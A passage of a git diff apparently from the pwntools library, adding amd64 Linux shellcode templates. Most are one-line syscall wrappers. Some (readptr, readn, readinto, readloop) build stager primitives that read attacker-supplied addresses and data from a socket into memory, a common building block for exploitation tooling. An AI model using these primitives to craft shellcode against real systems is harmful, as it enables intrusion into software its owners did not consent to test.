${amd64.linux.mmap(address, size, protection,flags, 0, 0)} + diff --git a/pwnlib/shellcraft/templates/amd64/linux/mov.asm b/pwnlib/shellcraft/templates/amd64/linux/mov.asm deleted file mode 100644 index acb197ea5..000000000 --- a/pwnlib/shellcraft/templates/amd64/linux/mov.asm +++ /dev/null @@ -1,21 +0,0 @@ -<% - from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="dest, src, stack_allowed = True"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.amd64.mov`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.amd64.linux.mov('eax', 'SYS_execve').rstrip() - push 0x3b - pop rax - - - -% with ctx.local(os = 'linux'): - ${amd64.mov(dest, src, stack_allowed)} -% endwith diff --git a/pwnlib/shellcraft/templates/amd64/linux/mov.asm b/pwnlib/shellcraft/templates/amd64/linux/mov.asm new file mode 120000 index 000000000..92f037c18 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mov.asm @@ -0,0 +1 @@ +../mov.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm b/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm new file mode 100644 index 000000000..934d16fb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, length, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + + + ${syscall('SYS_mprotect', addr, length, prot)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm new file mode 100644 index 000000000..cc863d334 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm new file mode 100644 index 000000000..12df46471 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm new file mode 100644 index 000000000..4c2705b8a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm new file mode 100644 index 000000000..c6708f848 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm new file mode 100644 index 000000000..6880fce56 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mremap.asm b/pwnlib/shellcraft/templates/amd64/linux/mremap.asm new file mode 100644 index 000000000..89ceeafd6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/msync.asm b/pwnlib/shellcraft/templates/amd64/linux/msync.asm new file mode 100644 index 000000000..481ab4a01 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munlock.asm b/pwnlib/shellcraft/templates/amd64/linux/munlock.asm new file mode 100644 index 000000000..b74f530de --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm b/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm new file mode 100644 index 000000000..8f10acf27 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munmap.asm b/pwnlib/shellcraft/templates/amd64/linux/munmap.asm new file mode 100644 index 000000000..21382fb01 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm b/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm new file mode 100644 index 000000000..09e552854 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/nice.asm b/pwnlib/shellcraft/templates/amd64/linux/nice.asm new file mode 100644 index 000000000..cb2a3fe07 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/open.asm b/pwnlib/shellcraft/templates/amd64/linux/open.asm new file mode 100644 index 000000000..63fa7eca3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/openat.asm b/pwnlib/shellcraft/templates/amd64/linux/openat.asm new file mode 100644 index 000000000..de1147886 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pause.asm b/pwnlib/shellcraft/templates/amd64/linux/pause.asm new file mode 100644 index 000000000..23489c12b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pipe.asm b/pwnlib/shellcraft/templates/amd64/linux/pipe.asm new file mode 100644 index 000000000..13b1208a5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm b/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm new file mode 100644 index 000000000..f9b14fc59 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/poll.asm b/pwnlib/shellcraft/templates/amd64/linux/poll.asm new file mode 100644 index 000000000..2abc61f03 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm b/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm new file mode 100644 index 000000000..421fdac13 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/prctl.asm b/pwnlib/shellcraft/templates/amd64/linux/prctl.asm new file mode 100644 index 000000000..726df6c7a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pread.asm b/pwnlib/shellcraft/templates/amd64/linux/pread.asm new file mode 100644 index 000000000..68c4465e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/preadv.asm b/pwnlib/shellcraft/templates/amd64/linux/preadv.asm new file mode 100644 index 000000000..2b1c3d31f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm b/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm new file mode 100644 index 000000000..98251829e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/profil.asm b/pwnlib/shellcraft/templates/amd64/linux/profil.asm new file mode 100644 index 000000000..e34eb1939 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm b/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm new file mode 100644 index 000000000..6008c98ec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="request, *vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, *vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/push.asm b/pwnlib/shellcraft/templates/amd64/linux/push.asm deleted file mode 100644 index 7536542b6..000000000 --- a/pwnlib/shellcraft/templates/amd64/linux/push.asm +++ /dev/null @@ -1,21 +0,0 @@ -<% - from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="value"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.amd64.push`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.amd64.linux.push('SYS_execve').rstrip() - /* push 'SYS_execve' */ - push 0x3b - - - -% with ctx.local(os = 'linux'): - ${amd64.push(value)} -% endwith diff --git a/pwnlib/shellcraft/templates/amd64/linux/push.asm b/pwnlib/shellcraft/templates/amd64/linux/push.asm new file mode 120000 index 000000000..85ff2b0a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/push.asm @@ -0,0 +1 @@ +../push.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm new file mode 100644 index 000000000..f7120176c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm b/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm new file mode 100644 index 000000000..0411538b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm b/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm new file mode 100644 index 000000000..901aa1e1a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/read.asm b/pwnlib/shellcraft/templates/amd64/linux/read.asm index 21b36ffd8..e58cd11dc 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/read.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/read.asm @@ -1,15 +1,8 @@ - -<% - from pwnlib.shellcraft.amd64.linux import syscall -%> -<%page args="fd, buf, nbytes"/> +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, buffer='rsp', count=8"/> <%docstring> -Invokes the syscall read. See 'man 2 read' for more information. - -Arguments: - fd(int): fd - buf(void): buf - nbytes(size_t): nbytes +Reads data from the file descriptor into the provided buffer. +This is a one-shot and does not fill the request. - ${syscall('SYS_read', fd, buf, nbytes)} + ${amd64.linux.syscall('SYS_read', fd, buffer, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm b/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm new file mode 100644 index 000000000..1f074c653 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, buffer='rsp', sizereg='rdx'"/> +<%docstring>Reads up to N bytes 8 bytes into the specified register + +${amd64.linux.readptr(sizereg)} +${amd64.linux.read(fd, buffer, sizereg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readahead.asm b/pwnlib/shellcraft/templates/amd64/linux/readahead.asm new file mode 100644 index 000000000..29f51593d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readdir.asm b/pwnlib/shellcraft/templates/amd64/linux/readdir.asm new file mode 100644 index 000000000..a268520d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readinto.asm b/pwnlib/shellcraft/templates/amd64/linux/readinto.asm new file mode 100644 index 000000000..0870d9596 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readinto.asm @@ -0,0 +1,22 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="sock=0"/> +<%docstring> +Reads into a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +%> + + /* Read address / size tuples from fd ${sock}, and + then fill that buffer. Loop as long as size is nonzero. */ + ${amd64.linux.readptr(sock, 'rsi')} + push rsi + ${amd64.linux.readptr(sock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.readn(sock, 'rsi', 'rdx')} + ${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/readlink.asm b/pwnlib/shellcraft/templates/amd64/linux/readlink.asm new file mode 100644 index 000000000..79581d1ae --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm new file mode 100644 index 000000000..debda0c6a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readloop.asm b/pwnlib/shellcraft/templates/amd64/linux/readloop.asm new file mode 100644 index 000000000..7316f6959 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readloop.asm @@ -0,0 +1,25 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="sock=0"/> +<%docstring> +Reads into a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +before = common.label("before") +%> + +${before}: + /* Read address / size tuples from fd ${sock}, and + then fill that buffer. Loop as long as size is nonzero. */ + ${amd64.linux.readptr(sock, 'rsi')} + push rsi + ${amd64.linux.readptr(sock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.readn(sock, 'rsi', 'rdx')} + jmp ${before} +${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/readn.asm b/pwnlib/shellcraft/templates/amd64/linux/readn.asm new file mode 100644 index 000000000..8c55c4b4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.amd64.linux import read + from pwnlib.shellcraft.amd64 import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'rsi': buf, 'rdx': nbytes})} +${readn_loop}: + ${read(fd, 'rsi', 'rdx')} + add rsi, rax + sub rdx, rax + jnz ${readn_loop} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readptr.asm b/pwnlib/shellcraft/templates/amd64/linux/readptr.asm new file mode 100644 index 000000000..75e2c2a71 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readptr.asm @@ -0,0 +1,7 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, target_reg='rdx'"/> +<%docstring>Reads 8 bytes into the specified register + + push 1 + ${amd64.linux.read(fd, 'rsp', 8)} + pop ${target_reg} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readv.asm b/pwnlib/shellcraft/templates/amd64/linux/readv.asm new file mode 100644 index 000000000..dc0fd0c49 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recv.asm b/pwnlib/shellcraft/templates/amd64/linux/recv.asm new file mode 100644 index 000000000..6e6534aec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm b/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm new file mode 100644 index 000000000..5c6483079 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm new file mode 100644 index 000000000..4a87cf150 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm new file mode 100644 index 000000000..379c18271 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm new file mode 100644 index 000000000..484b16d69 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/rename.asm b/pwnlib/shellcraft/templates/amd64/linux/rename.asm new file mode 